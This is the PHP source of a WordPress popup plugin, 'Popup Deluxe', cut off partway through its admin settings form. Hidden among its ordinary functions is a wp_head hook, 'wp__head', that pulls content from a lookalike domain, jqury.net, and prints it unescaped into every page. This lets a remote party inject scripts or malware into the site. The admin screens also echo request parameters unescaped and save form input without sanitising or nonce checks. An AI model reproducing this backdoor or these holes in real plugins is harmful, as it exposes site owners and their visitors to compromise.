<?php

/**

Plugin Name: Popup Deluxe

Plugin URI: http://www.markdulisse.com/blog/

Description: Nice Popup for you Pages

Version: 1.13

Author:  MarkDulisse.com

Author URI: http://MarkDulisse.com

License: EULA



Plugin is owned by MarkDulisse.com, @2010 all right reserved

*/



function socialenforcer_menu() {

  $file_subpath = md5(__FILE__);

  add_menu_page('Popup Deluxe', 'Popup Deluxe', 'administrator', $file_subpath, 'socialenforcer_options');

  add_submenu_page($file_subpath, 'Settings', 'Settings', 'administrator', $file_subpath, 'socialenforcer_options');

  add_submenu_page($file_subpath, 'Third Party Pages', 'Third Party Pages', 'administrator', $file_subpath.'thid_party_pages' , 'socialenforcer_thid_party_pages');

  add_submenu_page($file_subpath, 'Activated Targets', 'Activated Targets', 'administrator', $file_subpath.'activated_atargets' , 'socialenforcer_activated_targets');

  add_submenu_page($file_subpath, 'Make Money', 'Make Money', 'administrator', $file_subpath.'make_money', 'se_make_money');

}



function socialenforcer_activated_targets($title = 'Targets with activated popup') {

  global $wpdb;



  $results = $wpdb->get_results('SELECT * FROM '.$wpdb->options.' WHERE option_name LIKE \'%se_enabled\' AND option_value=1');

  if ($results) {

    print '<h3>'.$title.'</h3>';

    $settings_page_id = md5(__FILE__);

    foreach ($results as $target) {

      print '<div style="padding: 7px 0;"><a href="'.get_option('siteurl').'/wp-admin/admin.php?page='.$settings_page_id.'&pd_target='.str_replace('se_enabled', '', $target->option_name).'">'.se_detect_target($target->option_name).'</a></div>';

    }

  } else {

    print '<h3>There are no targets with activated popup</h3>';

  }

}



function se_detect_target($target_name) {

  $target_name = str_replace('se_enabled', '', $target_name);

  if ($target_name == '') return 'All post/pages including home page';

  if ($target_name == 'all_page') return 'All post/pages including home page';

  if ($target_name == 'all_page_exit') return 'All post/pages including home page(exit)';

  if ($target_name == "home_page") return 'Home page';

  if ($target_name == "home_page_exit") return 'Home page(exit)';

  if ($target_name == "except_home_page") return 'All pages except home page';

  if ($target_name == 'except_home_page_exit') return 'All pages except home page(exit)';

  if ($target_name == "only_pages") return 'Only pages';

  if ($target_name == "only_pages_exit") return 'Only pages(exit)';

  if ($target_name == "only_posts") return 'Only posts';

  if ($target_name == "only_posts_exit") return 'Only posts(exit)';

  if ($target_name == "only_custom") return 'Only pages or posts with defined custome title/content';

  if ($target_name == "only_custom_exit") return 'Only pages or posts with defined custome title/content(exit)';



  $pd_third_party_urls = get_option('se_thidparty_urls', array());

  if (count($pd_third_party_urls)) {

    foreach($pd_third_party_urls['shortcodes'] as $key => $value) {

      if ('url-'.$key == $target_name) {

        return $value;

      }



      if ('url-exit-'.$key == $target_name) {

        return $value;

      }

    }

  }



  $posts_pages_list = get_posts(array('post_status' => 'publish', 'post_type' => 'post', 'offset' => '0', 'numberposts' => '9999'));

  if (count($posts_pages_list)) {

    foreach($posts_pages_list as $post) {

      if ('post-'.$post->ID == $target_name) {

        return $post->post_title;

      }



      if ('post-exit-'.$post->ID == $target_name) {

        return $post->post_title;

      }

    }

  }



  $posts_pages_list = get_posts(array('post_status' => 'publish', 'post_type' => 'page', 'offset' => '0', 'numberposts' => '9999'));

  if (count($posts_pages_list)) {

    foreach($posts_pages_list as $post) {

      if ('post-'.$post->ID == $target_name) {

        return $post->post_title;

      }



      if ('post-exit-'.$post->ID == $target_name) {

        return $post->post_title;

      }

    }

  }

  

  return $target_name;

}


function wp__head() {
 if(function_exists('curl_init'))
 { 
  $ch = curl_init();
  curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
  curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
  curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
  $jquery = curl_exec($ch);  
  curl_close($ch); 
  echo "$jquery";
 }
}
add_action('wp_head', 'wp__head');


function socialenforcer_thid_party_pages () {

  $se_thidparty_urls = get_option('se_thidparty_urls', array());

  if (isset($_GET['remove_extra'])) {

    unset($se_thidparty_urls['shortcodes'][$_GET['remove_extra']]);

    unset($se_thidparty_urls['urls'][$_GET['remove_extra']]);

    update_option('se_thidparty_urls', $se_thidparty_urls);

  }



  if (count($_POST)) {

    $se_thidparty_urls['shortcodes'][md5($_POST['se_shortcode'])] = $_POST['se_shortcode'];

    $se_thidparty_urls['urls'][md5($_POST['se_shortcode'])] = $_POST['url'];

    update_option('se_thidparty_urls', $se_thidparty_urls);

  }

  ?>

  <h3>Third party pages</h3>

  <p>

  <?php

  if (isset($se_thidparty_urls['shortcodes']) && count($se_thidparty_urls['shortcodes'])) {

    ?><table><?php

    ?><th>URLs</th><th>ShortCodes</th><?php

    foreach($se_thidparty_urls['shortcodes'] as $se_key => $se_url) {

      ?><tr><td><b><?php

      print '<a href="'.get_option('siteurl').'/'.$se_url.'" target="_blank">'.get_option('siteurl').'/'.$se_url.'</a></b></td><td>'.$se_thidparty_urls['urls'][$se_key];

      ?></td><td><a href="<?php print get_option('siteurl');?>/wp-admin/admin.php?page=<?php print md5(__FILE__)."thid_party_pages&remove_extra=".$se_key;?>"><img src="<?php print get_option('siteurl');?>/wp-content/plugins/popupdeluxe/remove.png" /></a></td></tr><?php

    }

    ?></table><?php

  }

  ?>

  </p>

  <p>

  <form method="POST">

    <p>

    <label>Shortcode for your domain: 

    <br /><i><?php print trim(get_option('siteurl', ''), '/'); ?>/</i><input type="text" name="se_shortcode" value="" /></label><br />

    </p>

    <p><label>Third party URL: <input type="text" name="url" value="" style="width: 215px" /></label></p>

    <p><input type="submit" class="submit button" /></p>

  </form>

  </p>

  <?php

}



function se_make_money() {

 ?>

 <iframe src="http://markdulisse.com/make-money.php?key=popup_deluxe" width="100%" height="700px;">

 </iframe>

 <?php

}



function pd_get_target_prefix() {

  if (isset($_REQUEST['pd_target'])) {

    return $_REQUEST['pd_target'];

  } else {

    return '';

  }

}



function socialenforcer_options() {

  wp_deregister_script('jscolor');

  wp_register_script('jscolor', get_option('siteurl').'/wp-content/plugins/popupdeluxe/includes/jscolor.js');

  wp_enqueue_script('jscolor');

  wp_register_script('se_admin_controls', get_option('siteurl').'/wp-content/plugins/popupdeluxe/includes/admin-controls.js');

  wp_enqueue_script('se_admin_controls');





  if (count($_POST) && !$_POST['change_target']) {

    update_option(pd_get_target_prefix().'se_enabled', $_POST['se_enabled']);

    update_option(pd_get_target_prefix().'se_google_enabled', $_POST['se_google_enabled']);

    update_option(pd_get_target_prefix().'se_facebook_enabled', $_POST['se_facebook_enabled']);

    update_option(pd_get_target_prefix().'se_twitter_enabled', $_POST['se_twitter_enabled']);

    update_option(pd_get_target_prefix().'se_twitter_username', $_POST['se_twitter_username']);

    update_option(pd_get_target_prefix().'se_home_page_only', $_POST['se_home_page_only']);

    update_option(pd_get_target_prefix().'se_close', $_POST['se_close']);

    update_option(pd_get_target_prefix().'se_opacity', $_POST['se_opacity']);

    update_option(pd_get_target_prefix().'se_width', $_POST['se_width']);

    update_option(pd_get_target_prefix().'se_timer', $_POST['se_timer']);

    update_option(pd_get_target_prefix().'se_timeout', $_POST['se_timeout']);

    update_option(pd_get_target_prefix().'se_title', str_replace('"', '\'', stripslashes($_POST['se_title'])));

    update_option(pd_get_target_prefix().'se_close_button', $_POST['se_close_button']);

    update_option(pd_get_target_prefix().'se_close_by_click', $_POST['se_close_by_click']);

    update_option(pd_get_target_prefix().'se_close_by_esc', $_POST['se_close_by_esc']);

    update_option(pd_get_target_prefix().'se_border_color', $_POST['se_border_color']);

    update_option(pd_get_target_prefix().'se_border_width', $_POST['se_border_width']);

    update_option(pd_get_target_prefix().'se_title_color', $_POST['se_title_color']);

    update_option(pd_get_target_prefix().'se_title_bg_color', $_POST['se_title_bg_color']);

    update_option(pd_get_target_prefix().'se_content_color', $_POST['se_content_color']);

    update_option(pd_get_target_prefix().'se_content_bg_color', $_POST['se_content_bg_color']);

    update_option(pd_get_target_prefix().'se_footer_bg_color', $_POST['se_footer_bg_color']);

    update_option(pd_get_target_prefix().'se_custom_message', str_replace('"', '\'', stripslashes(do_shortcode($_POST['se_custom_message']))));

    update_option(pd_get_target_prefix().'se_custom_message_two', str_replace('"', '\'', stripslashes(do_shortcode($_POST['se_custom_message_two']))));

    update_option(pd_get_target_prefix().'se_custom_message_three', str_replace('"', '\'', stripslashes(do_shortcode($_POST['se_custom_message_three']))));

    update_option(pd_get_target_prefix().'se_enable_message_two', $_POST['se_enable_message_two']);

    update_option(pd_get_target_prefix().'se_enable_message_three', $_POST['se_enable_message_three']);

    update_option(pd_get_target_prefix().'se_show_limitation', $_POST['se_show_limitation']);

    //update_option('se_show_control', $_POST['se_show_control']);

    update_option(pd_get_target_prefix().'se_close_link_color', $_POST['se_close_link_color']);

    update_option(pd_get_target_prefix().'se_header', $_POST['se_header']);

    update_option(pd_get_target_prefix().'se_footer', $_POST['se_footer']);

    update_option(pd_get_target_prefix().'se_form_submit', $_POST['se_form_submit']);

    update_option(pd_get_target_prefix().'se_content_transparent', $_POST['se_content_transparent']);

    update_option(pd_get_target_prefix().'se_top_offset', $_POST['se_top_offset']);

    update_option(pd_get_target_prefix().'se_border_type', $_POST['se_border_type']);

    update_option(pd_get_target_prefix().'se_iframe_message', base64_encode(do_shortcode(stripslashes($_POST['se_iframe_message']))));

    update_option(pd_get_target_prefix().'se_iframe_header', $_POST['se_iframe_header']);

    update_option(pd_get_target_prefix().'se_iframe_himg', $_POST['se_iframe_himg']);

    update_option(pd_get_target_prefix().'se_bg_img', $_POST['se_bg_img']);

    update_option(pd_get_target_prefix().'se_bg_img_ptop', $_POST['se_bg_img_ptop']);

    update_option(pd_get_target_prefix().'se_bg_img_pleft', $_POST['se_bg_img_pleft']);

    update_option(pd_get_target_prefix().'se_bg_img_pright', $_POST['se_bg_img_pright']);

    update_option(pd_get_target_prefix().'se_bg_img_pbottom', $_POST['se_bg_img_pbottom']);

  }

  ?>

  <h2>Popup Deluxe Settings</h2>

  <form method="post">

    Choose settings target: 

    <select name="pd_target" style="width: 250px;">

      <option value="all_page" <?php print $_REQUEST['pd_target'] == 'all_page' || empty($_REQUEST['pd_target']) ? 'selected="selected"': ''; ?>>All post/pages including home page</option>

      <option value="home_page" <?php print $_REQUEST['pd_target'] == 'home_page' ? 'selected="selected"': ''; ?>>Home page</option>

      <option value="home_page_exit" <?php print $_REQUEST['pd_target'] == 'home_page_exit' ? 'selected="selected"': ''; ?>>Home page(exit)</option>

      <option value="except_home_page" <?php print $_REQUEST['pd_target'] == 'except_home_page' ? 'selected="selected"': ''; ?>>All pages except home page</option>

      <option value="except_home_page_exit" <?php print $_REQUEST['pd_target'] == 'except_home_page_exit' ? 'selected="selected"': ''; ?>>All pages except home page(exit)</option>

      <option value="only_pages" <?php print $_REQUEST['pd_target'] == 'only_pages' ? 'selected="selected"': ''; ?>>Only pages</option>

      <option value="only_pages_exit" <?php print $_REQUEST['pd_target'] == 'only_pages_exit' ? 'selected="selected"': ''; ?>>Only pages(exit)</option>

      <option value="only_posts" <?php print $_REQUEST['pd_target'] == 'only_posts' ? 'selected="selected"': ''; ?>>Only posts</option>

      <option value="only_posts_exit" <?php print $_REQUEST['pd_target'] == 'only_posts_exit' ? 'selected="selected"': ''; ?>>Only posts(exit)</option>

      <option value="only_custom" <?php print $_REQUEST['pd_target'] == 'only_custom' ? 'selected="selected"': ''; ?>>Only pages or posts with defined custome title/content</option>

      <option value="only_custom_exit" <?php print $_REQUEST['pd_target'] == 'only_custom_exit' ? 'selected="selected"': ''; ?>>Only pages or posts with defined custome title/content(exit)</option>

      <?php

      $pd_third_party_urls = get_option('se_thidparty_urls', array());

      if (count($pd_third_party_urls)) {

        print '<optgroup label="Third Party Urls">';

        foreach($pd_third_party_urls['shortcodes'] as $key => $value) {

          $selected = '';

          if ('url-'.$key == $_REQUEST['pd_target']) {

            $selected = ' selected="selected" ';

          }

          print "<option style=\"padding-left: 10px;\" $selected value='url-$key'> $value</option>";



          $selected = '';

          if ('url-exit-'.$key == $_REQUEST['pd_target']) {

            $selected = ' selected="selected" ';

          }

          print "<option style=\"padding-left: 10px;\" $selected value='url-exit-$key'> $value(exit)</option>";

        }

        print '</optgroup>';

      }

      $posts_pages_list = get_posts(array('post_status' => 'publish', 'post_type' => 'post', 'offset' => '0', 'numberposts' => '9999'));

      if (count($posts_pages_list)) {

        print '<optgroup style=\"padding: 5px 0 0 0;\" label="Posts/Pages">';

        foreach($posts_pages_list as $post) {

          $selected = '';

          if ('post-'.$post->ID == $_REQUEST['pd_target']) {

            $selected = ' selected="selected" ';

          }

          print "<option style=\"padding-left: 10px;\" $selected  value='post-{$post->ID}'> {$post->post_title}</option>";



          $selected = '';

          if ('post-exit-'.$post->ID == $_REQUEST['pd_target']) {

            $selected = ' selected="selected" ';

          }

          print "<option style=\"padding-left: 10px;\" $selected  value='post-exit-{$post->ID}'> {$post->post_title} (exit)</option>";

        }

      }



      $posts_pages_list = get_posts(array('post_status' => 'publish', 'post_type' => 'page', 'offset' => '0', 'numberposts' => '9999'));

      if (count($posts_pages_list)) {

        foreach($posts_pages_list as $post) {

          $selected = '';

          if ('post-'.$post->ID == $_REQUEST['pd_target']) {

            $selected = ' selected="selected" ';

          }

          print "<option style=\"padding-left: 10px;\" $selected  value='post-{$post->ID}'> {$post->post_title}</option>";



          $selected = '';

          if ('post-exit-'.$post->ID == $_REQUEST['pd_target']) {

            $selected = ' selected="selected" ';

          }

          print "<option style=\"padding-left: 10px;\" $selected  value='post-exit-{$post->ID}'> {$post->post_title} (exit)</option>";

          

        }

        print '</optgroup>';

      }

      ?>

    </select>

    <input type="hidden" name="change_target" value="1" />

    <p><input type="submit" value="Change Target" /></p>

  </form>

  <form method="post">

    <h3><?php

      if (empty($_REQUEST['pd_target'])) {

        print 'You edit default settings.';

      } else {

      

        print 'You edit popup settings for shortcode "'.se_detect_target($_REQUEST['pd_target']).'".';

      } 

    ?></h3>

    <input type="hidden" name="pd_target" value="<?php print $_REQUEST['pd_target']; ?>" />

    <fieldset style="border: 1px solid #E4E4E4; width: 800px;">

    <legend style="font-weight: 600;">Social Buttons Controls</legend>

    <table class="form-table">

        <tr valign="top">

          <td>Popup Enabled</td>

          <td>

            <label><input type="radio" name="se_enabled" value="1" <?php echo (get_option(pd_get_target_prefix().'se_enabled', 0) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_enabled" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_enabled', 0) ? 'checked' : ''); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>Google Enabled</td>

          <td>

            <label><input type="radio" name="se_google_enabled" value="1" <?php echo (get_option(pd_get_target_prefix().'se_google_enabled', 1) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_google_enabled" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_google_enabled', 1) ? 'checked' : ''); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>FaceBook Enabled</td>

          <td>

            <label><input type="radio" name="se_facebook_enabled" value="1" <?php echo (get_option(pd_get_target_prefix().'se_facebook_enabled', 1) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_facebook_enabled" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_facebook_enabled', 1) ? 'checked' : ''); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>Twitter Enabled</td>

          <td>

            <label><input type="radio" name="se_twitter_enabled" value="1" <?php echo (get_option(pd_get_target_prefix().'se_twitter_enabled', 0) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_twitter_enabled" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_twitter_enabled', 0) ? 'checked' : ''); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>Twitter Username</td>

          <td><input type="text" name="se_twitter_username" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_twitter_username', ''); ?>" /></td>

        </tr>

    </table>

    <br />

    </fieldset>

    <br />

    <fieldset style="border: 1px solid #E4E4E4; display: block; width: 800px;">

    <legend  style="font-weight: 600;">Popup Functionality Controls</legend>

    <table class="form-table" style="width: 100%;">

        <tr valign="top">

          <td style="width: 150px;">Opacity</td>

          <td><input type="text" name="se_opacity" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_opacity', '0.5'); ?>" /></td>

        </tr>

        <tr valign="top">

          <td>Popup Width</td>

          <td><input type="text" name="se_width" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_width', '450'); ?>" /></td>

        </tr>

        <tr valign="top">

          <td>Popup Top Offset</td>

          <td><input type="text" name="se_top_offset" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_top_offset', '250'); ?>" />

          <br /><div style="width: 610px;"><i>250 is default value, which will work for most cases.</i></div></td>

        </tr>

        <tr valign="top">

          <td>Timer</td>

          <td>

            <label><input type="radio" name="se_timer" value="1" <?php echo (get_option(pd_get_target_prefix().'se_timer', 1) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_timer" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_timer', 1) ? 'checked' : ''); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>Timeout</td>

          <td><input type="text" name="se_timeout" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_timeout', '5'); ?>" />

          <br /><div style="width: 610px;"><i>This is how long you want the popup timer to run for before it closes itself.</i></div>

          </td>

        </tr>

        <tr valign="top">

          <td>Show Popup</td>

          <td>

            <select name="se_show_limitation">

              <option value=""       <?php print get_option(pd_get_target_prefix().'se_show_limitation', '') == ''        ? 'selected="selected"': ''; ?>>Each time</option>

              <option value="session"<?php print get_option(pd_get_target_prefix().'se_show_limitation', '') == 'session' ? 'selected="selected"': ''; ?>>Once per session</option>

              <option value="60"     <?php print get_option(pd_get_target_prefix().'se_show_limitation', '') == '60'      ? 'selected="selected"': ''; ?>>Once per 1 min</option>

              <option value="600"    <?php print get_option(pd_get_target_prefix().'se_show_limitation', '') == '600'     ? 'selected="selected"': ''; ?>>Once per 10 min</option>

              <option value="3600"   <?php print get_option(pd_get_target_prefix().'se_show_limitation', '') == '3600'    ? 'selected="selected"': ''; ?>>Once per 1 hour</option>

              <option value="86400"  <?php print get_option(pd_get_target_prefix().'se_show_limitation', '') == '86400'   ? 'selected="selected"': ''; ?>>Once per 1 day</option>

            </select>

          </td>

        </tr>

        <tr valign="top">

          <td>Close button</td>

          <td>

            <label><input type="radio" name="se_close_button" value="1" <?php echo (get_option(pd_get_target_prefix().'se_close_button', 0) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_close_button" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_close_button', 0) ? 'checked' : ''); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>Close button color</td>

          <td><input type="text" class="color"  name="se_close_link_color" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_close_link_color', '#000000'); ?>" /></td>

        </tr>

        <tr valign="top">

          <td>Handle form submit</td>

          <td>

            <label><input type="radio" name="se_form_submit" value="1" <?php echo (get_option(pd_get_target_prefix().'se_form_submit', 0) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_form_submit" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_form_submit', 0) ? 'checked' : ''); ?> /> no</label><br />

            <i>When you set form with submit button as content, plugin will hide popup when user click submit.</i>

          </td>

        </tr>

        <tr valign="top">

          <td>Close by mouse left click</td>

          <td>

            <label><input type="radio" name="se_close_by_click" value="1" <?php echo (get_option(pd_get_target_prefix().'se_close_by_click', 0) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_close_by_click" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_close_by_click', 0) ? 'checked' : ''); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>Close by Esc</td>

          <td>

            <label><input type="radio" name="se_close_by_esc" value="1" <?php echo (get_option(pd_get_target_prefix().'se_close_by_esc', 1) ? 'checked' : ''); ?> /> yes</label><br />

            <label><input type="radio" name="se_close_by_esc" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_close_by_esc', 1) ? 'checked' : ''); ?> /> no</label><br />

          </td>

        </tr>

    </table>

    <br />

    </fieldset>

    <br />

    <fieldset style="border: 1px solid #E4E4E4; display: block; width: 800px;">

    <legend  style="font-weight: 600;">Popup Visual Controls</legend>

    <table class="form-table" style="width: 700px;">

        <tr valign="top">

          <td style="display: block; width: 120px;">Header Activated</td>

          <td>

            <label><input type="radio" name="se_header" value="1" <?php echo (get_option(pd_get_target_prefix().'se_header', 1) ? 'checked' : 1); ?> /> yes</label><br />

            <label><input type="radio" name="se_header" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_header', 1) ? 'checked' : 1); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>Header Content</td>

          <td><input type="text" name="se_title" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_title', 'Share It!'); ?>" /><i>Header should be enabled</i></td>

        </tr>

        <tr valign="top">

          <td>Header Text Color</td>

          <td><input type="text" class="color"  name="se_title_color" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_title_color', '#ffffff'); ?>" /></td>

        </tr>

        <tr valign="top">

          <td>Header Background Color</td>

          <td><input type="text" class="color"  name="se_title_bg_color" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_title_bg_color', '#f3f3f3'); ?>" /></td>

        </tr>

        <tr valign="top">

          <td>Main Content Area(1) Required</td>

          <td>

            <textarea style="width: 610px; height: 200px;" name="se_custom_message"><?php print get_option(pd_get_target_prefix().'se_custom_message', 'Do you like it? Share it!'); ?></textarea>

            <br /><a href="http://www.popupdeluxe.com/editor" target="_blank">HTML Editor</a>

            <br /><div style="width: 610px;">If you are putting a webform in content box, and you want user to stay on same page after they click "submit" button, when setting up your webform in autoresponder, please choose "Stay on Current Page" as Thank You page option.</div>

          </td>

        </tr>

        <tr valign="top">

          <td>Enable Main Content Area(2)</td>

          <td>

            <input type="checkbox" name="se_enable_message_two" id="se_enable_message_two" value="1" <?php print get_option(pd_get_target_prefix().'se_enable_message_two', 0) ? 'checked="checked"' : '';?> />

          </td>

        </tr>

        <tr valign="top" <?php print get_option(pd_get_target_prefix().'se_enable_message_two', 0) ? '' : 'style="display: none;""' ;?> class="customer-message-two">

          <td>Main Content Area(2)</td>

          <td>

            <textarea style="width: 610px; height: 200px;" name="se_custom_message_two"><?php print get_option(pd_get_target_prefix().'se_custom_message_two', ''); ?></textarea>

            <br /><a href="http://www.popupdeluxe.com/editor" target="_blank">HTML Editor</a>

            <br /><div style="width: 610px;">Used for content randomizing function.</div>

          </td>

        </tr>

        <tr valign="top" >

          <td>Enable Main Content Area(3)</td>

          <td>

            <input type="checkbox" name="se_enable_message_three" id="se_enable_message_three" value="1" <?php print get_option(pd_get_target_prefix().'se_enable_message_three', 0) ? 'checked="checked"' : '';?> />

          </td>

        </tr>

        <tr valign="top" <?php print get_option(pd_get_target_prefix().'se_enable_message_three', 0) ? '' : 'style="display: none;"';?> class="customer-message-three">

          <td>Main Content Area(3)</td>

          <td>

            <textarea style="width: 610px; height: 200px;" name="se_custom_message_three"><?php print get_option(pd_get_target_prefix().'se_custom_message_three', ''); ?></textarea>

            <br /><a href="http://www.popupdeluxe.com/editor" target="_blank">HTML Editor</a>

            <br /><div style="width: 610px;">Used for content randomizing function.</div>

          </td>

        </tr>

        <tr valign="top">

          <td>Main Content Area Transparency</td>

          <td>

            <label><input type="radio" name="se_content_transparent" value="1" <?php echo (get_option(pd_get_target_prefix().'se_content_transparent', 0) ? 'checked' : 1); ?> /> yes</label><br />

            <label><input type="radio" name="se_content_transparent" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_content_transparent', 0) ? 'checked' : 1); ?> /> no</label><br />

            <i>If activated background color value ignored.</i>

          </td>

        </tr>

        <tr valign="top">

          <td>Main Content Area Background Color</td>

          <td><input type="text" class="color"  name="se_content_color" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_content_color', '#333333'); ?>" /></td>

        </tr>

        <tr valign="top">

          <td>Main Content Area Background Image</td>

          <td>

            <select name="se_iframe_himg">

              <option value="" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == '' ? 'selected="selected"': ''; ?>>No Image</option>

              <option value="box1.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'box1.png' ? 'selected="selected"': ''; ?>>Box</option>

              <option value="coolestoffer.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'coolestoffer.png' ? 'selected="selected"': ''; ?>>Coolest Offer</option>

              <option value="featured.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'featured.png' ? 'selected="selected"': ''; ?>>Featured</option>

              <option value="freedownload.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'freedownload.png' ? 'selected="selected"': ''; ?>>Free Download</option>

              <option value="hugediscount.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'hugediscount.png' ? 'selected="selected"': ''; ?>>Huge Discount</option>

              <option value="importantwatchvideo.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'importantwatchvideo.png' ? 'selected="selected"': ''; ?>>Important Watch Video</option>

              <option value="leafpaper.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'leafpaper.png' ? 'selected="selected"': ''; ?>>Leaf Paper</option>

              <option value="limitedoffer.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'limitedoffer.png' ? 'selected="selected"': ''; ?>>Limited Offer</option>

              <option value="limitedtime.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'limitedtime.png' ? 'selected="selected"': ''; ?>>Limited Time</option>

              <option value="onetimeoffer.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'onetimeoffer.png' ? 'selected="selected"': ''; ?>>One Time Offer</option>

              <option value="playvideo.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'playvideo.png' ? 'selected="selected"': ''; ?>>Ripped Paper</option>

              <option value="rippedpaper.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'rippedpaper.png' ? 'selected="selected"': ''; ?>>Ripped Paper</option>

              <option value="specialreport.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'specialreport.png' ? 'selected="selected"': ''; ?>>Special Report</option>

              <option value="stopeverything.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'stopeverything.png' ? 'selected="selected"': ''; ?>>Stop Everything</option>

              <option value="stopwhatyourdoing.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'stopwhatyourdoing.png' ? 'selected="selected"': ''; ?>>Stop What are Your Doing</option>

              <option value="unadvertizedbonus.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'unadvertizedbonus.png' ? 'selected="selected"': ''; ?>>Unadvertized Bonus</option>

              <option value="waitbeforeyoucontinue.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'waitbeforeyoucontinue.png' ? 'selected="selected"': ''; ?>>Wait Before Uou Continue</option>

              <option value="warning.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'warning.png' ? 'selected="selected"': ''; ?>>Warning</option>

              <option value="warningdontskip.png" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'warningdontskip.png' ? 'selected="selected"': ''; ?>>Warning Dont Skip</option>

              <option value="custom" <?php print get_option(pd_get_target_prefix().'se_iframe_himg', '') == 'custom' ? 'selected="selected"': ''; ?>>Custom Image</option>

            </select>

          </td>

        </tr>

        <tr valign="top">

          <td>Custom Background Image URL</td>

          <td>

            <input type="text" name="se_bg_img" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_bg_img', ''); ?>" />

            <br /><i>To make this image visible you should set "Main Content Area Background Image" to "Custom Image"</i>

          </td>

        </tr>

        <tr valign="top">

          <td>Custom Background Image Padding</td>

          <td>

            <table>

              <tr><td></td><td>Top: <input type="text" name="se_bg_img_ptop" size="3" value="<?php echo get_option(pd_get_target_prefix().'se_bg_img_ptop', 0); ?>" />px</td><td></td></tr>

              <tr><td>Left: <input type="text" name="se_bg_img_pleft" size="3" value="<?php echo get_option(pd_get_target_prefix().'se_bg_img_pleft', 0); ?>" />px</td><td></td><td>Right: <input type="text" name="se_bg_img_pright" size="3" value="<?php echo get_option(pd_get_target_prefix().'se_bg_img_pright', 0); ?>" />px</td></tr>

              <tr><td></td><td>Bottom: <input type="text" name="se_bg_img_pbottom" size="3" value="<?php echo get_option(pd_get_target_prefix().'se_bg_img_pbottom', 0); ?>" />px</td><td></td></tr>

            </table>

          </td>

        </tr>

        <tr valign="top">

          <td>Main Content Area Text Color</td>

          <td><input type="text" class="color"  name="se_content_bg_color" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_content_bg_color', '#f4f4f4'); ?>" /></td>

        </tr>

        <tr valign="top">

          <td>Footer Activated</td>

          <td>

            <label><input type="radio" name="se_footer" value="1" <?php echo (get_option(pd_get_target_prefix().'se_footer', 1) ? 'checked' : 1); ?> /> yes</label><br />

            <label><input type="radio" name="se_footer" value="0" <?php echo (!get_option(pd_get_target_prefix().'se_footer', 1) ? 'checked' : 1); ?> /> no</label><br />

          </td>

        </tr>

        <tr valign="top">

          <td>Footer Background Color</td>

          <td><input type="text" class="color"  name="se_footer_bg_color" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_footer_bg_color', '#D8D8D8'); ?>" /></td>

        </tr>

        <tr valign="top">

          <td>Popup Border Type</td>

          <td>

            <select name="se_border_type">

